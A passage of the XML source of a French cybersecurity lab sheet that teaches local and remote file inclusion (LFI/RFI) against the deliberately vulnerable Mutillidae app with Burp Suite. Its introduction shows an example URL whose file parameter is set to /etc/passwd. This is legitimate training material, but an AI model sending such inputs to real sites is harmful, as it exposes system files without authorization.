            </w:r>
            <w:hyperlink r:id="rId9" w:tgtFrame="https://portswigger.net/burp/communitydownload">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte1"/>
                  <w:color w:val="000080"/>
                </w:rPr>
                <w:t>https://portswigger.net/burp/communitydownload</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="02AAA347" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A318C7A" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Mots-clés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09E71F5B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP, Mutillidae 2.8.75, BurpSuite v2021.8.2, vulnérabilités, LFI, RFI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="502114A3" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67469DA0" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B1A043B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Deux heures  pour cette activité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="707618F3" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20219CD0" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Auteur(es)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4489AB1C" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Patrice DIGNAN, avec la relecture, les tests et les suggestions de Hervé Le Guern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="56BAC9BD" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7DA822ED" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3650D9A8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>v 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E2504F" w14:paraId="1242EDE4" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1868" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="56DA2AFB" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="990033"/>
              </w:rPr>
              <w:t>Date de publication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7366" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000080"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000080"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0AAFB86D" w14:textId="767B7058" w:rsidR="00E2504F" w:rsidRDefault="001A5FE3">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:widowControl w:val="0"/>
            </w:pPr>
            <w:r>
              <w:t>Novembre 2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CACF176" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B80719" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF50BA6" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:id w:val="-1190903010"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="52CC904F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText>TOC \f \o "1-9" \u \h</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="0CC90F98" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9668"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5063_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t xml:space="preserve">I Problématique </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="__RefHeading___Toc5063_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>de l’inclusion de fichiers</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="__RefHeading___Toc5063_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>2</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1867E9CD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9668"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5073_30143627171" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>II Inclusion de fichiers locaux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>2</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65811E0F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9668"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5073_301436271711" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>III Inclusion de fichiers distants</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="256B1552" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9668"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5073_3014362717111" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>IV Maquette de travail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="181DA589" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9668"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc2903_1010401007" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t xml:space="preserve">V Premier défi : </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="__RefHeading___Toc2903_1010401007" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>Inclusion locale de fichiers</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="__RefHeading___Toc2903_1010401007" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44643BD5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents5"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9869"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5077_30143627173" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>1 Objectif</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="545823A8" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents5"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9869"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc2360_19211572582" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>2 À vous de jouer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="545CD698" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9668"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5083_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>VI Deuxième défi :</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="__RefHeading___Toc5083_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="__RefHeading___Toc5083_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>Inclusion distante de fichiers</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="__RefHeading___Toc5083_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08A17B02" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents5"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9869"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5085_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>1 Objectif</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35F8C3E2" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents5"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9869"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5087_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>2 À vous de jouer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="237F8BDF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Contents4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9668"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5099_3014362717" w:tgtFrame="Current Document">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:t>VII Contre-mesures</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Sautdindex"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Sautdindex"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6F25AA86" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F"/>
    <w:p w14:paraId="130BBF95" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C175FE" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD87A53" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__RefHeading___Toc5063_3014362717"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>Problématique de l’inclusion de fichiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D98EF5" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:color w:val="660066"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604E0772" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C809454" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Présentation :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC73447" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:color w:val="660066"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:color w:val="660066"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D78DD" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Les applications web peuvent avoir besoin d’accéder à des fichiers (images, texte…) sur un système donné via des paramètres attachés à une URL. Si ces paramètres ne sont pas sécurisés alors un attaquant peut effectuer une inclusion de fichiers afin de récupérer des informations ou pour effectuer des actions non autorisées. Deux types d’inclusion sont abordées dans cette activité :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F826D6E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29AD092D" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L’inclusion de fichiers locaux (LFI - Local File Inclusion) ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E45D29F" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L’inclusion de fichiers distants (RFI - Remote File Inclusion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ADFE59" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3903550E" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exemple :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2C0D1" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490BFDBF" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>légitime :http://www.site-inclusion.local/index.php?file=</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="http://www.site-inclusion.local/index.php?file=contenu.pdf">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte1"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="000080"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>cgu</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId11" w:tgtFrame="http://www.site-inclusion.local/index.php?file=contenu.pdf">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte1"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="000080"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C1270D6" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Inclusion illégitime: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.site-inclusion.local/index.php?file=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7FA387" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00E2504F">
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB1272B" w14:textId="77777777" w:rsidR="00E2504F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans cet exemple, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> est le nom du paramètre et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
